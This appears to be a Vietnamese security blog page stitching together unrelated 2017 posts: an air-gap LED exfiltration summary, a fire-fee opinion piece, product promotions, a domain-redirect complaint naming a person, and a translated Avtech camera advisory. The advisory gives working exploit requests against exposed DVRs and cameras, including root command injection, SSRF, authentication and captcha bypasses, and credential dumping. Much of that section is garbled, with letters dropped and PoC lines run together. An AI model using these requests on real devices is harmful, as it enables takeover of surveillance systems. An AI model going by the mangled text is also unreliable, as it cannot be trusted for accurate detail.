The security diy

The security diy
..

Chủ Nhật, 23 tháng 7, 2017

xLED hacked ,từ router wifi có thể lấy cắp

LED hồng ngoại, phần mềm độc hại có thể rò rỉ dữ liệu nhạy cảm được lưu trữ trên thiết bị với tốc độ 15 bit / giây. Lưu ý rằng cách tiếp cận này của họ đòi hỏi kẻ tấn công triển khai xâm nhập trong tổ chức để tác động phần cứng .

Trong bài báo này, chúng tôi chỉ ra làm cách nào kẻ tấn công có thể bí mật làm rò rỉ dữ liệu (ví dụ như các khoá mã hóa, mật khẩu và tệp tin) từ một mạng có độ bảo mật cao hoặc không khí bị che khuất thông qua hàng đèn LED trạng thái , các led này là sự tồn tại có sẵn trong các thiết bị mạng như bộ chuyển mạch LAN và bộ định tuyến.


Mặc dù người ta biết rằng một số thiết bị mạng phát ra các tín hiệu quang học tương quan với thông tin được xử lý bởi thiết bị ("kênh phụ"), cố tình kiểm soát các đèn LED trạng thái để mang bất kỳ loại dữ liệu nào ('kênh bí mật') nhưng điều này chưa bao giờ được nghiên cứu .

Một mã độc hại được thực hiện trên bộ chuyển mạch LAN hoặc router, cho phép kiểm soát hoàn toàn các đèn LED trạng thái. Dữ liệu nhạy cảm có thể được mã hoá và điều chế qua sự nhấp nháy của đèn LED. Các tín hiệu tạo ra sau đó có thể được ghi lại bởi các loại camera từ xa và cảm biến quang học.

Chúng tôi cung cấp nền tảng kỹ thuật về kiến ​​trúc nội bộ của thiết bị chuyển mạch và bộ định tuyến (cả cấp phần cứng và phần mềm) cho phép thử nghiệm áp dụng loại tấn công này. Chúng tôi cũng trình bày sự điều chế dựa trên biên độ và tần số và các lược đồ mã hóa, cùng với một giao thức truyền một cách đơn giản cho dễ hiểu .

 Chúng tôi thực hiện một mẫu thử nghiệm của một phần mềm độc hại lọc và thảo luận về thiết kế và thực hiện. Chúng tôi đánh giá phương pháp này với một vài bộ định tuyến và các loại đèn LED khác nhau. Ngoài ra, chúng tôi đã thử nghiệm các máy thu khác nhau bao gồm máy ảnh từ xa, camera an ninh, máy chụp hình thông minh, và cảm biến quang học, đồng thời thảo luận các biện pháp đối phó phát hiện và phòng ngừa khác nhau. Thí nghiệm của chúng tôi cho thấy dữ liệu nhạy cảm có thể bị rò rỉ bí mật thông qua các đèn LED trạng thái của bộ chuyển mạch và bộ định tuyến với tốc độ bit 10 bit / giây đến hơn 1Kbit / giây trên mỗi đèn LED.

Từ khoá-lọc; lỗ hổng không khí; Mạng; Quang; Covertchannel (từ khóa)
Keywords— ezfiltration; air-gap; network; optical; covertchannel (key words)

Antoanvn tiếp tục giới thiệu bài viết cụ thể hơn, bao gồm các tài liệu kỹ thuật, tài liệu lý giải bằng tiếng anh , các bạn làm việc an ninh chuyên nghiệp có thể tải về kèm theo trong bài sau . Tài liệu này được dịch hoàn chỉnh 100% qua tiếng Việt, nếu bạn có nhu cầu có thể tải về "tốn phí" , là nguồn toàn diện để bạn có thể tham chiếu thực hành hay thực nghiệm ngăn chận.


AIR GAP IN SECURITY
GIỚI THIỆU

Air gap được hiểu là khoảng cách không khí trong an ninh mạng là trường hợp mạng máy tính bị cách ly với các mạng khác. Đặc biệt, mạng lưới không khí được giữ cẩn thận cách ly khỏi các mạng không an toàn và công cộng như Internet.

Ngày nay, các mạng lưới không khí được sử dụng rộng rãi trong các hệ thống phòng thủ quân sự, cơ sở hạ tầng quan trọng, khu vực tài chính và ngành công nghiệp .

Sự cô lập khoảng trống không khí được duy trì bằng cách thực thi các chính sách nghiêm ngặt trong tổ chức. Các chính sách này bao gồm việc cấm các thiết bị và phương tiện không bảo mật bên ngoài kết nối với mạng và sử dụng hệ thống phát hiện và ngăn chặn xâm nhập tiên tiến để loại trừ vi phạm bảo mật theo ý định và tình cờ.

Một ví dụ được biết đến rộng rãi của mạng không khí bị che khuất là Hệ thống Thông tin Tình báo Liên minh Toàn cầu (JWICS), một mạng lưới phân loại bí mật hàng đầu (Top Secret / SCI) thuộc Cơ quan Tình báo Quốc phòng Hoa Kỳ. JWICS được sử dụng để chuyển các tài liệu phân loại giữa Bộ Quốc phòng, Bộ Ngoại giao, Bộ An ninh Nội địa và Bộ Tư pháp. Anh. xử lý các mạng lưới không khí bị che khuất Trong thập kỷ qua, nó đã được chứng minh tác dụng bảo vệ là các mạng lưới bị che phủ bằng không khí cũng không bị ảnh hưởng bởi những hành vi vi phạm. Xem Bài viết  này.



Thứ Bảy, 10 tháng 6, 2017

Ý KIẾN : có nên thu một khoản tiền của người để tài trợ việc phòng chống cháy.

BÀI VIẾT THEO NHIỀU YÊU CẦU ,GỢI Ý chủ đề tạm gọi là: 

GÓP Ý KIẾN.


Trước hết , antoanvn muốn đưa bài viết theo một suy nghĩ giản đơn , "là một số điều mà chúng ta là một người dân, cần nhìn nhận thật sự theo môi trường sống vừa có sự phán quyết của riêng mình" điều dễ thấy là có phần công nhận sự hợp lý có kết quả lợi chung thì cùng hưởng, còn ngược lại thì cũng chung tay cùng chịu chứ?   điều này chỉ là thuận tình và thuận theo cuộc sống văn minh tiến lên tiếp .

Nếp sống văn minh của đô thị-mới là  cuộc sống hàng ngày ta cọ-xát nên các loại thiết bị báo cháy tự động, phòng chống cháy chưa được coi trọng đúng mức cần thiết , vì các "thứ này"mọi người sống chỉ nghe nói lắp-đặt thiết bị ở đâu đâu mà ít thấy "nó".

Có khi người dân quanh chúng ta có cảm giác chưa an lòng với các phần việc về an toàn , phòng cháy chữa cháy là một công việc khó giải thích ngay liền, ( chỉ trừ khi có lửa bắt đầu cháy--dĩ nhiên) chỉ nghe nói là có nhân viên...., có cảnh sát ngành PCCC lo công việc là giữ an toàn cho mình, mà là nghe nói vậy thôi còn hàng ngày thì cứ thấy người này thì làm những việc kia , không có gì mà thấy là việc làm về phòng chống cháy .

Xin trở lại chủ đề chính : 

Sắp tới họ sẽ bắt đầu thu phí về các họat động PCCC ,hệ thống thiết bị báo cháy tự động ,hệ thống chữa cháy,thiết bị chống cháy thụ động (PFP), như mọi nơi trên thế giới.(chỉ là ý kiến )

Tất cả chủ sở hữu tài sản phải trả một phần cao hơn tùy thuộc không gian cư ngụ hoặc cho bất kỳ nhu cầu khác trong khu vực cấu trúc xây dựng. Mọi người đều sẽ trả thêm về chi phí sử dụng cho việc phòng cháy, và theo một số lớn người dân ngụ tại , họ đều cho rằng như vậy mới đúng và được thấy là có công bằng hơn.

Nếu có khoản chi phí này , bên có trách nhiệm sẽ dễ dàng để triển khai các biện pháp ngăn ngừa hỏa hoạn hiệu quả hơn,khi lắp đặt đúng chuẩn cho hệ thống báo cháy tự động của nơi này. Về nguyên lý thì có tín hiệu báo cháy từ sớm đúng và chính xác ; sẽ giúp cho bộ phận PCCC dập tắt ,ngăn chận ngay mọi nguy cơ có thể bùng cháy lớn.Cho dù là báo cháy giả,báo lầm thì phần việc này bên pccc tại chỗ cũng làm rất nhiệt tình vì họ có nhận tiền lương cho công việc đảm trách : tiền xuất ra từ nguồn thu thêm phí an toàn phòng cháy như đã nói ở trên, là của mọi người sống tại đây.

Sẽ có đặt ra các qui định tham khảo và theo luật quốc tế về việc lập ra ban kiểm tra về an toàn pccc ,có hiểu biết,có năng lực, được chọn lọc theo quyết định của những người đã được tín nhiệm bởi các đại diện người dân tại đây .Là một hợp đồng làm việc tư nhân, hoàn toàn do người dân tại chỗ chỉ-bầu ra mà không có bất cứ liên quan gì đến ngành cảnh sát pccc hoặc chính quyền. 

Câu chuyện về các bước tiến hành thu phụ trợ

thu phí pccc tư nhân như thu thuế tại Anh Quốc.

Các nhà lãnh đạo quận Alachua đã tiến lên phía trước vào thứ năm với một kế hoạch có thể sẽ thay đổi cách thức chi tiền trả cho hoạt động phòng cháy . Tiền này sẽ được trả cho các bộ phận liên quan trực tiếp tại chỗ và không phải là các đơn vị đã có của quận và các tổ chức do quận lập ra từ trước đây , có phần gọi là cảnh sát dự bị ngành pccc. 

Nhưng việc biết đánh giá hỏa hoạn sẽ ảnh hưởng đến người nộp thuế là điều không thể nắm bắt ngay bây giờ bởi vì việc đánh giá thực tế năng lực hoạt động vẫn chưa được xác định.

Các ủy viên quận đã bỏ phiếu hôm thứ năm ngày 3 tháng 2 , để tiến lên phía trước với việc phát triển mức lệ phí đánh giá hỏa hoạn trong quá trình lập ngân sách của quận vào tháng 6 và tháng 7 năm 2017, để các chủ sở hữu tài sản có thể được thông báo về việc đánh giá trong các thông báo thuế tính theo mức tài sản sẽ được gửi tới mọi người trong tháng Tám.

Ủy viên Mike Byerly và Charles Chestnut đã bỏ phiếu chống lại đánh giá.

Các ủy viên thảo luận về vấn đề này trong cuộc họp kéo dài 3 tiếng rưỡi, trong đó Byerly nói rằng đánh giá sẽ chuyển gánh nặng phải trả cho các dịch vụ chữa cháy từ tầng lớp giàu sang người nghèo..

Byerly cho biết: "Theo đánh giá, người giàu sẽ trả ít hơn và người nghèo sẽ phải trả nhiều hơn.
Dịch vụ chữa cháy được cung cấp cho tất cả mọi người và mọi người nên giúp họ trả tiền, Ủy viên Lee Pinkoson phản bác.

Việc có thu phí đánh giá hỏa hoạn sẽ thay thế cho các khoản Phí Hiện hành Dịch vụ Đô thị hiện tại (MSTU) mà nhiều người trong quận hiện nay phải trả.

Các ủy viên quận đã dành phần lớn cuộc họp tháng này với lãnh đạo của một số thị trấn nhỏ hơn của quận, bao gồm Archer, Waldo, Hawthorne và Alachua để phác thảo các khái niệm chung về cách đánh giá sẽ làm việc như thế nào.

Theo các bài thuyết trình được thực hiện tại các thị trấn, một số lợi ích đánh giá về phòng cháy bao gồm:

  • Khoảng 30 phần trăm của giá sẽ giống nhau đối với tất cả các bưu kiện, và 70 phần trăm sẽ dựa trên giá trị tài sản.
  • Tất cả chủ sở hữu tài sản phải trả một phần chi phí cho việc phòng cháy, và một số có thể cho rằng công bằng hơn.
  • Nó có thể bao gồm nhiều chi phí dịch vụ hơn mức thuế MSTU hiện tại, có nghĩa là các quỹ thuế khác nhỏ hơn có thể được chuyển hướng đến các dịch vụ khác trong các khu vực chưa được thành lập.

Những bất lợi, theo bài trình bày của quận, sẽ bao gồm:
  • Người nộp thuế có thể bị lẫn lộn.
  • Một số người có thể coi nó là hồi quy, có nghĩa là nó sẽ đánh người nghèo khó nhất.
  • Nó không xem xét tình trạng cư dân hoặc nhà ở.

Các ủy viên đã bỏ phiếu nhất trí tạo ra một quỹ khó khăn cho chủ sở hữu tài sản nghèo, nhưng không quyết định số tiền để đưa vào quỹ.

Erick van Malssen, một chuyên gia tư vấn quản lý của công ty tư vấn Stantec, hướng dẫn kế hoạch đánh giá khả năng hỏa hoạn của quận, cho biết công ty của ông ước tính nhu cầu của các dịch vụ chữa cháy của Quận Alachua là hơn 13 triệu đô la mỗi năm, 

Và chi phí đó sẽ tiếp tục tăng lên , do phải tăng lính cứu hỏa, chính hay dự bị , tỷ lệ bảo hiểm sức khoẻ cao, xây dựng các trạm cứu hỏa mới và các yếu tố khác

Van Malssen nói: "Chi phí của bạn sẽ tăng lên trong năm năm tới. "Đây sẽ là mức phí đánh giá hỏa hoạn tiến bộ nhất trong tiểu bang nếu nó được thông qua."

Tommy Crosby, giám đốc phụ trách các dịch vụ ngân sách và ngân sách cho biết, việc áp dụng đánh giá sẽ khôn ngoan bởi vì nó sẽ đảm bảo tài trợ cho các dịch vụ hỏa hoạn có thể bị ảnh hưởng nếu một sáng kiến ​​bỏ phiếu toàn tiểu bang vào tháng 11 năm 2018 sẽ giúp tăng mức miễn giảm nhà ở lên 25.000 đô la.

Các quan chức quận ước tính rằng các khoản miễn giảm gia tăng có thể khiến Quận Alachua phải trả hơn 7 triệu đô la thuế bất động sản.

Quản lý Hạt Lee Niblock nói với các ủy viên rằng việc đảm bảo "cơ chế tài trợ" cho các dịch vụ hỏa hoạn sẽ làm giảm khả năng cơ quan lập pháp ngăn cấm hoa hồng tăng thuế trong tương lai để trả cho các dịch vụ chữa cháy.

"Tôi nghĩ rằng bạn đang đi trước đường cong với cuộc thảo luận này," Niblock nói.
( còn tiếp )

Thứ Sáu, 9 tháng 6, 2017

Thousandeyes một công cụ an ninh mạng,thông minh dễ dùng.

Công cụ an ninh mạng  đa dạng thông minh.
Antoanvn đang thực hiện các hướng dẫn tiếng Việt đi kèm khi bạn tải về dùng thử ,phiên bản Trial của Thousandeyes.com.

Video giới thiệu , ngắn nói rõ tính năng nhiệm vụ cũng như khả năng đáp ứng nhu cầu của nhiều người dùng đa dạng.


Thứ Sáu, 26 tháng 5, 2017

LƯU Ý: các trang web blogger-blogspot.com ,ai bị Zilo.com redir chặn trang?

Hiện nay, antoanvn.com là một trang weblog trên nền tảng của G Blogger .

Khoảng 2 tuần vừa qua trang web của antoanvn.com và một số trang khác cũng tạo trên nền tảng blogger.com của Google đã bị một cty chuyên mua bán tên miền là Uniregistry.com , với Scripts tạo mã xấu là "REDIR" trang của blogger qua website domain nhằm quảng cáo bán tên miền ZILO.com.




Tác động Redirect của Zilo.com cố tình chặn và cắt hẳn tên miền của blogger như trang antoanvn.com ( xin xem video kèm theo ) làm chúng tôi thiệt hại rất trầm trọng,do khách hàng  hoặc bạn đọc không thể vào xem website và liên lạc như thường lệ.
 

Tôi đăng đoạn ngắn này với ý cụ thể : tuyên bố sẽ thưa kiện cty Uniregistry.com là đơn vị chủ quản của tên miền Zilo.com. 

Đồng thời là người trực tiếp liên quan là chủ của tên miền Zilo.com ,là người đã tạo ra các đoạn mã REDIR nhằm ngăn chặn và phá hỏng công việc kinh doanh của antoanvn.com trong hai tuần lễ vừa qua .
Matthew Rosebrook đòi bán 5 trăm ngàn usd ? có ai đòi mua đâu ?
Cụ thể là một cá nhân tên Matthew Rosebrook đã trả lời tôi trực tiếp từ một trang thành viên Uniregistry.com và còn đòi bán tên miền Zilo.com cho tôi với giá 500.000 USD,( điên thiệt! ) có thể hiện rõ là nằm trong tên miền cty chủ quản là Uniregistry.com.Không biết là ý của ai, Matthew hay Uniregistry Inc ..

Uniregistry.Inc
 Có một điều antoanvn.com đã kiểm lại về địa chỉ cụ thể của Uniregistry Inc
là ở cụm "Đảo Cayman" , con số ghi địa chỉ là một số của phòng riêng hoặc phòng trọ nào gần đó vì antoanvn đã gọi điện thoại qua Cayman theo số ghi của một địa chỉ mà Uniregistry đăng tải chính thức,nhưng không phải là nơi chốn văn phòng làm việc.

Tôi đã liên lạc với Uniregistry.com và được NGƯỜI ĐẠI DIỆN hứa sẽ trả lời cụ thể cách thức giải quyết việc này.

 Do vậy, ngày mai sẽ cập nhật tiếp.


Thứ Bảy, 20 tháng 5, 2017

Công cụ tính toán mức độ an toàn chuẩn quốc tế cho cty, nhà ở , văn phòng,nhà máy..

Safety calculator công cụ tính toán an toàn bây giờ bao gồm chuẩn EN ISO 13849-1

Pilz Automation Technology đang phát hành một phiên bản mới của gói phần mềm PAScal mạnh mẽ để thực hiện các phép tính cần thiết khi thiết kế các hệ thống điều khiển máy an toàn theo tiêu chuẩn EN ISO 13849-1 hoặc EN IEC 62061. PAScal giúp dễ dàng hơn để đảm bảo sự tuân thủ Tiêu chuẩn 'yêu cầu, cộng với nó giúp tiết kiệm cả thời gian và chi phí.
Phiên bản 1.2.0 bao gồm một biểu đồ tính toán theo EN ISO 13849-1, và nó cũng có lợi từ một số cải tiến cho cả chức năng và khả năng sử dụng.
Ngoài ra, PAScal 1.2.0 chạy trên các máy tính cá nhân với Microsoft Windows .

Cũng như phiên bản trước, PAScal 1.2.0 có giao diện đồ họa trực quan cho phép người dùng hình dung được kiến ​​trúc hệ thống an toàn - nhờ đó giúp tránh được lỗi.
Tuy nhiên, không giống như phiên bản trước đó, PAScal 1.2.0 cho phép người dùng mở nhiều dự án, đó là một lợi thế lớn khi làm việc trên các máy móc phức tạp hoặc các dự án mới tương tự như các phiên bản trước đó.

Khả năng sử dụng của PAScal 1.2.0 được cải tiến hơn nữa bằng phương tiện trợ giúp theo ngữ cảnh và người dùng hiện có quyền kiểm soát tốt hơn các sở thích của họ.


PAScal cho phép các chức năng an toàn của hệ thống điều khiển được chia thành các hệ thống con (như cảm biến, đầu vào, đầu ra, bộ truyền động và logic), sau đó phần mềm tính ra xác suất tổng thể của một lỗi nguy hiểm mỗi giờ (PFHD) và kiểm tra dữ liệu 
  • Với mức hiệu suất quy định (EN ISO 13849-1) .
  • hoặc mức độ toàn vẹn về an toàn (EN IEC 62061). 
Phần mềm có thể tính đến các kiến ​​trúc thay thế có thể và các biến thể trong cách các thành phần được kết nối với nhau và tham số hóa. Một cải tiến hữu ích trong phiên bản 1.2.0 liên quan đến cách thức kết nối fieldbus an toàn có thể được cấu hình.

Khi thiết kế theo tiêu chuẩn EN ISO 13849-1, máy tính đánh giá các lỗi phổ biến (CCF) và chẩn đoán (DC) bằng cách xem xét các yếu tố như quần short giữa các địa chỉ liên lạc hoặc theo dõi tính đồng bộ trên các cảm biến đa kênh.

Việc củng cố máy tính là một cơ sở dữ liệu có chứa một bộ dữ liệu toàn diện cho các sản phẩm an toàn của Pilz. Phiên bản PAScal 1.2.0 hỗ trợ việc sử dụng các thư viện của bên thứ ba, và những cải tiến về cây chuyển hướng làm cho việc tìm các sản phẩm được yêu cầu trong thư viện trở nên dễ dàng hơn. Người dùng có thể dễ dàng thêm vào thư viện nếu họ muốn thiết kế hệ thống kiểm soát với các thành phần khác mà họ sở hữu các dữ liệu số có liên quan.

Như trước, PAScal 1.2.0 cho phép tạo báo cáo cho tài liệu dự án và dữ liệu có thể được sử dụng lại trong các dự án mới. Trong cả hai trường hợp, tiết kiệm thời gian có giá trị có thể tích lũy.
.
Vui lòng liên hệ antoanvn security diy, để yêu cầu thêm thông tin về máy tính an toàn PAScal hoặc để nhận hướng dẫn tiếng Việt

Người dùng chuyên nghiệp hoặc các kỹ thuật viên có thể tải về phên bản demo (bên dưới)  . Vì là bản demo free trial có một số chức năng bị giới hạn nhưng vẫn rất hữu ích cho công việc chuyên nghiệp tập dần theo chuẩn QT. của các đơn vị Việt Nam.


Thứ Ba, 25 tháng 4, 2017

Fortem 3D Omnipresence ,camera phần mềm Fortem 3D kiem soat

Quan tâm vê` camera chuyên dụng ? hoặc làm thương mại ?gọi số : 841285495521 nếu bạn muốn liên hệ gắp mặt. Bên dưới là email dịch từ anh ngữ của Ông Jim Kellen của cty Fortem.

Chào buổi chiều, điều này có thể được một chút căng thẳng, nhưng tôi nghĩ rằng tôi sẽ cố gắng ...

Tôi đại diện cho Fortem một công ty cung cấp giải pháp phần mềm quản lý bảo mật tiên tiến cho cácbệnh viện, trung tâm dữ liệu, nha ga xe diên ngâm ,cac sân bay lớn, thành phố và các cơ quan quốc phòng.  Chúng tôi có trụ sở tại Montreal với một nhóm chuyên viên thực hiện dat van phong tại Singapore. 



Tôi muốn nói chuyện với bạn về việc thiết lập một mối quan hệ của một số loại.thiet bi cho thuong mai. Tôi đã được giao nhiệm vụ mở cửa thị trường Việt Nam.

Tôi sẽ đánh giá cao bất kỳ lời khuyên bạn có thể sẵn sàng chia sẻ về thị trường và cung cách hoạt động. Tôi sẽ ở TP HCM vào cuối tuần này. Bạn có thời gian cho viêc uôngcà phê không? di cung vai nguoi ban lam kinh doanh vietnam nua la hoan hao.

Giải pháp bảo mật lệnh và kiểm soát 3D được cho là tốt nhất trong ngành thiết bị an ninh an toàn.

Omnipresence 3D tích hợp với bất kỳ thiết bị an ninh nào (máy quay video và ghi âm, điều khiển truy cập, phân tích video, cảm biến chuyển động, sinh trắc học, GIS, GPS, phát hiện súng ống, vv) vào môi trường 3D độc đáo và tự động. 

Một số dự án hiện tại của chúng tôi bao gồm một trung tâm dữ liệu của Đài Loan, một bệnh viện ở Ả-rập Xê-út, thành phố Calgary, Canada, Sân bay Quốc tế Calgary và dự án quản lý an ninh quốc phòng bao gồm hàng chục trang web, hàng ngàn camera và trên một triệu nhân viên. 


Hơn nữa, chúng tôi đã được mời thầu nhiều dự án khác nhau, bao gồm cả hồ sơ dự thầu của Bộ Ngoại giao Hoa Kỳ cho toàn bộ mạng lưới các đại sứ quán và lãnh sự quán trên khắp thế giới.

Tôi sẽ ở TP Hồ Chí Minh từ giữa ngày Thứ Tư 26 tháng 4 đến giữa buổi sáng Thứ Bảy, ngày 29 tháng 4. Bạn có sẵn sàng và có thể gặp tôi không?  

Trân trọng,
 Jim Kellett, Corporate Advisor at Fortem .

Thứ Hai, 3 tháng 4, 2017

Lỗ hổng bảo mật từ camera Avtech là rất nghiêm trọng. ( cảnh báo cho người dùng VN )

Avtech nhiu lhng bo mt trong camera và hệ thống giám sát
Nn tng và phn cng của Avtech được xác nhn bị ảnh hưởng rất nghiêm trọng. ( trong bài viết nêu cụ thể các tính năng bị bỏ trống và các lệnh khai thác dễ dàng vào trong một camera hay Dvr,Nvr của Avtech.com.tw.)

Mi thiết bca Avtech  Taiwan (camera IP, NVR, DVR) với phiên bn phn mm có sẵn, cha danh sách các phiên bn phn mm đă được xác nhn đă bị ảnh hưởng.

Trang sn phm: http://www.avtech.com.tw/

"AVTECH, thành lp năm 1996, là mt trong nhng nhà sn xut CCTV hàng đu trên thế gii. Vi doanh thu gia tăng n đnh và triết lý kinh doanh thc tin, AVTECH đă được xếp hng là công ty niêm yết ln nht trong ngành công nghip giám sát ca Đài Loan''.

AVTECH nlc hết mình để đổi mi công ngh, sn phm và thc hin sản xuất. Da trên nhng năm nghiên cu và kinh nghim trong ngành, AVTECH đă có được vtrí hàng đu vhtrnn di đng và cung cp đy đcác sn phm hệ thống camera giám sát.

Avtech là thut ngtìm kiếm phbiến thhai trong nguồn tìm kiếm Shodan. Theo Shodan, hơn 130.000 thiết bca Avtech đang tiếp xúc internet trong mã-lỗi an ninh quan trọng này.

Các lhng

1) Lưu tr mt khu qun tr dạng Plaintext.
Mi mt khu người dùng được lưu trtrong một văn bn txt rő ràng. Mt ktn công có quyn truy cp vào thiết bchính nó có thddàng có được danh sách đy đcác mt khu. Bng cách khai thác các lnh tiêm hoc các vn đbqua xác thc, kẻ tấn công có thtruy xut mt khu qun trbằng một tập tin văn bn rő ràng.

2) Thiếu bo vCSRF .
Giao din web của Avtech không sdng bt kbo vCSRF nào. Nếu mở phiên mặc định tn ti cho người dùng, ktn công có thsa đi tt ccác cài đt ca thiết bqua CSRF. Nếu không có phiên làm vic hp l, nhưng người dùng không thay đi mt khu qun trmc đnh, ktn công cũng có thể đăng nhp như qun trviên thông qua CSRF.

3) Không chng thc thông tin công b

Dưới thư mc / cgi-bin / nobody , mi tp lnh CGI đu có thể được truy cp mà không cn qua các thủ tục xác thc.
POC:
GET /cgi-bin/nobody/Machine.cgi?action=get_capability

Ví dtrli:

Firmware.Version = 1011-1005-1008-1002
MACAddress = 00: 0E: 53: xx: xx: xx
Product.Type = DVR
Product.ID = 308B
Product.ShortName = V_full_Indep, V_Multistream
Video.System = PAL
Audio.DownloadFormat = ULAW
Video.Input.Num = 8
Video.Output.Num = 1
Video.Format = H264, MJPEG
Video.Format.Default = H264
Video.Resolution = 4CIF, CIF
Video.Cht lượng = BEST, HIGH, NORMAL, BASIC
Video.Local.Input.Num = 8
Video.Local.Output.Num = 1
Video.Local.Format = H264, MJPEG
Audio.Input.Num = 8
Audio.Output.Num = 1
Audio.Format = ULAW
Audio.Local.Input.Num = 8
Audio.Local.Output.Num = 1
Audio.Local.Format = PCM
Ngôn ng.Default = ENGLISH

Language.Support = ENGLISH & CHINESE & JAPANESE & PHÁP & GERMAN & Tiếng Tây Ban Nha & PORTUGUESE & ITALIAN & TURKISH & POLISH & RUSSIAN & CUSTOMIZE & THAI & VIT NAM & DUTCH & GREEK & ARABIC & Séc & Hung và HEBREW & CHINA &
Khnăng = D0,80, A, 80
PushNotify.MaxChannel = 8

4) Không xác thc SSRF trong thiết bDVR

Trong trường hp với thiết bDVR, Search.cgi có thể được truy cp mà không cn xác thc. Dch vnày có trách nhim tìm kiếm và truy cp vào các camera IP trong mng ni b. Trong các phiên bn phn mm mi hơn, Search.cgi cung cp hành đng cgi_query, thc hin mt yêu cu HTTP vi các tham số được chỉ định. Bng cách sa đi các tham sip, port và queryb64str, ktn công có ththc hin các yêu cu HTTP tùy ý thông qua thiết bDVR mà không cn phải xác thc.
POC:
/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==

"Http: // <device_ip> /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==

5) Không cn xác thc đ tiêm lnh trong các thiết bDVR

Hành đng cgi_query trong Search.cgi thc hin các yêu cu HTML vi lnh hthng wget, sdng các tham số đă nhn mà không cn dn sch hoc xác minh theo đúng thông l an toàn. Bng cách khai thác vn đnày, ktn công có ththc hin bt klnh hthng nào vi quyn  root  mà không cn xác thc.
POC:
/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password$(ps"Http: // <device_ip> /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password> $ (ps | Grep% 20Search.cgi | grep% 20-v% 20grep | đu% 20-n% 201 | awk% 20 '(in% 20 "/ tmp /" $ 1 ".log"}'); & password = admin

6) bqua xác thc # 1 (.cab)

Plugin cho chương trình phát video được lưu trdưới dng tp .cab trong thư mc gc ca web, trưng hp này có thể được truy cp và ti xung mà không cn xác thc. Xác minh yêu cu tp cab trên máy chweb streamd được thc hin vi chc năng strstr , có nghĩa là yêu cu không cần được xác thc nếu nó có cha chui ".cab" bt knơi nào trong URL.

ü Antoanvn lưu ý bn rng : mt smô hình camera dvr tt của các nhà sản xuất khác hơn đu có cha mt lnh kim tra bsung trong CgiDaemon, cho phép cgi unauthenticated chtruy cp vào thư mc / cgi-bin / nobody.
POC:
/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
"Http: // <device_ip> /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*

7) bqua xác thc # 2 (nobody)

Cgi script trong thư mc / cgi-bin / nobody có thể được truy cp mà không cần có sự xác thc (ví dnhư để đăng nhp). Máy chweb streamd  khi xác minh cho yêu cu có thể được thc hin mà không cn xác thc bng cách tìm kiếm chui "/ nobody" trong URL vi chc năng strstr.

Vì vy, nếu có mt yêu cu nào cha chui "/ nobody"  ti bt knơi nào trong URL, khi đó nó không cn phi được chng thc.
ü Antoanvn lưu ý bn rng: mt smô hình camera dvr tt hơn của các nhà sản xuất khác ,luôn luôn có cha mt lệnh kim tra bsung trong CgiDaemon, cho phép cgi unauthenticated chtruy cp vào thư mc / cgi-bin / nobody.
POC:
/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*

"Http://<device_ip> /cgi.bin/user/Config.cgi?/nobody&action=get&category=Account.*

8) Không được chng thc khi ti v
(File download from web root)

Nếu mt file .cab được yêu cu, máy chweb sgi tp tin mà không cn xlý nó. Bi vì  máy chweb streamd xác minh yêu cu tp cab bng cách tìm kiếm chui ".cab" trong URL có chc năng strstr, bt ktp nào (ngay ccác tp lnh cgi) trong web root có thể được ti xung mà không cần có xác thc.
POC:
http: / / /cgi-bin/cgibox?.cab9) Login captcha bypass #1To prevent brute-forcing attempts, Avtech devices require a captcha for login requests."/<device_ip>/cgi-bin/cgibox?.cab9)  

Đăng nhp captcha bypass # 1
Đngăn chn các nlc brute-force, thiết bAvtech yêu cu mt captcha cho các yêu cu đăng nhp. /cgi-bin/nobody/VerifyCode.cgi?account=&login" .Tuy nhiên, nếu các yêu cu đăng nhp cha thông slogin = quick, vic xác minh captcha được bqua.
POC:
http: // <device_ip> /cgi-bin/nobody/VerifyCode.cgi?account= <b64 (username: password)> và đăng nhp = Quick10)

Đăng nhp captcha bypass # 2
Thay vì sdng ID theo các phiên ngu nhiên, thiết bcamera Dvr ca Avtech sdng tên người dùng và mt khu được mă hoá base64 dưới dng giá trCookie. Vì đa chIP ca người dùng đă đăng nhp không được lưu tr, nếu ktn công đt Cookie theo cách thcông, xác minh captcha có thbqua ddàng.11)

Vic tiêm lnh injection được xác thc trong CloudSetup.cgiDevices htrợ đám mây Avtech cha CloudSetup.cgi  .Được truy cp sau khi xác thc.

Tham sexefile ca mt yêu cu CloudSetup.cgi chra lnh hthng sẽ được thc thi. /cgi-bin/supervisor/CloudSetup.cgi?exefile=ps12 .Vì không có kim tra hoc kim tra da trên danh sách trng ca tha
Kích hot lnh đă được thm đnh trong adcommand.cgiSome ca các thiết bAvtech cha adcommand.cgi  đthc hin các lnh ActionD. Adcommand.cgi có thể được truy cp sau khi xác thc.
Trong các thiết bmi hơn, daemon ActionD cung cp chc năng DoShellCmd, thc hin cuc gi hthng vi các tham số được chỉ định. Vì không có kim tra hoc kim tra da trên danh sách trng ca tham sca chc năng DoShellCmd, ktn công có ththc hin các lnh hthng tùy ý vi các đc quyn root.
POC:
POST /chelp /chelp / bộ điu khin / ads_micro.cgi HTTP / 1.1Host: <device_ip > PwdGrp.cgi

Sdng tên người dùng, mt khu và các tham snhóm trong mt yêu cu to hoc sa đi người dùng mi trong mt lnh hthng mà không cn có strgiúp ca PwdGrp.cgi. để xác nhn hoc khtrůng.
Do đó và ktn công có ththc hin các lnh hthng tùy ý vi quyn root. 

/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN14)

"Chúng tôi biết rng lhng này đang được khai thác trong tnhiên
POC:
http: // <device_ip> /cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN14)

HTTPS được sdng mà không có chng chxác minh Tác gi . SyncCloudAccount.sh, QueryFromClient.sh và SyncPermit.sh sdng wget đtruy cp các trang web HTTPS, chng hn như https: //payment.eagleeyes.tw, bng cách xác đnh tham skhông kim tra chng ch.
